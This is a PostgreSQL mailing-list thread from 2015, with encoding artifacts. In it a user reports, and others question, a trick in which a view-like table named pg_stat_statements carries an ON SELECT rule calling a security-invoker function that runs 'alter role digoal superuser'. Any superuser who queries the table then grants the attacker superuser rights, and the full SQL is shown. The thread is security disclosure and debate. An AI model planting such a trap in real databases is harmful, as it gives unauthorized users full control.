And what would be an acceptable solution/behavior in your eyes?
On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com> wrote:
>
> The point is:
> Superuser will be trick possible. like phishing sites.
> FOR EXP:
> DBA, or some monitor / admin software query these table or view.
>
> --
> =E5=85=AC=E7=9B=8A=E6=98=AF=E4=B8=80=E8=BE=88=E5=AD=90=E7=9A=84=E4=BA=8B,=
I'm Digoal,Just Do It.
>
> =E5=9C=A8 2015-09-30 10:01:12=EF=BC=8C"David G. Johnston" <david.g.johnst=
on@gmail.com
> <javascript:_e(%7B%7D,'cvml','david.g.johnston@gmail.com');>> =E5=86=99=
=E9=81=93=EF=BC=9A
>
> On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com
> <javascript:_e(%7B%7D,'cvml','digoal@126.com');>> wrote:
>
>> a normal user get super privilege, use security invoker function.
>> postgres=3D> create table pg_stat_statements (
>> userid oid ,
>> dbid oid ,
>> queryid bigint ,
>> query text ,
>> calls bigint ,
>> total_time double precision ,
>> rows bigint ,
>> shared_blks_hit bigint ,
>> shared_blks_read bigint ,
>> shared_blks_dirtied bigint ,
>> shared_blks_written bigint ,
>> local_blks_hit bigint ,
>> local_blks_read bigint ,
>> local_blks_dirtied bigint ,
>> local_blks_written bigint ,
>> temp_blks_read bigint ,
>> temp_blks_written bigint ,
>> blk_read_time double precision ,
>> blk_write_time double precision );
>>
>> postgres=3D> create or replace function f() returns pg_stat_statements a=
s
>> $$
>> declare
>> begin
>> alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a super user select the view pg_stat_statements , the normal user
>> digoal will granted the superuser role.
>>
>> Yes, it's a normal operation ,but somebody can use these trick.
>>
>
>
> Everything you just wrote was done as superuser so what's your point?
>
> David J.
>
>